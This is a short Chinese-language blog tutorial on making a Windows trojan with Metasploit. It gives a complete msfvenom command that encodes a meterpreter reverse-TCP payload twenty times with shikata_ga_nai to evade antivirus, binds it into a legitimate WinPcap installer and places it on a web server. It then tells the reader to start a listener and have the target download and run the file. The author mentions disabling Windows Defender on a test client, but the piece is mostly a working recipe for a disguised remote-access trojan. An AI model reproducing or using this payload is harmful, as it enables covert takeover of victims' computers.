MSF制作一个Windows木马
0x01 MSF编码
在Metasploit下可以使用MSF编码器来达到免杀的效果,即对攻击载荷文件进行重新的排列编码以避免被杀毒软件认出,但是实际上接下来制作的这种简易的木马还是很容易就能被识别出来的,所以用于测试的客户机我是关掉了Windows defener的,不然一下载下来就被杀掉了。
MSF有很多的编码格式,我使用的是
x86/shikata_ga_nai
这个格式对于Windows系统来说是合适的
0x02 制作免杀木马
对于现在的防护系统来说不裸奔木马很容易就能被查出来,所以一般做木马的时候都会把木马捆绑到一个正常可执行文件上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -e x86/shikata_ga_nai -x WinPcap_4_1_3.exe -i 20 -f exe -o /var/www/html/cap.exe
-e 指定编码格式
-x 指定木马捆绑的程序
-i 指定编码次数,理论上次数越多越不容易被查杀
-f 指定输出格式
-o 指定输出路径

然后在kali上开始监听

把参数设置好,注意监听的窗口要和制作木马时设置的监听窗口一致
接下来就是把马挂在服务器上然后用目标机去访问下载下来运行就可以了

浙公网安备 33010602011771号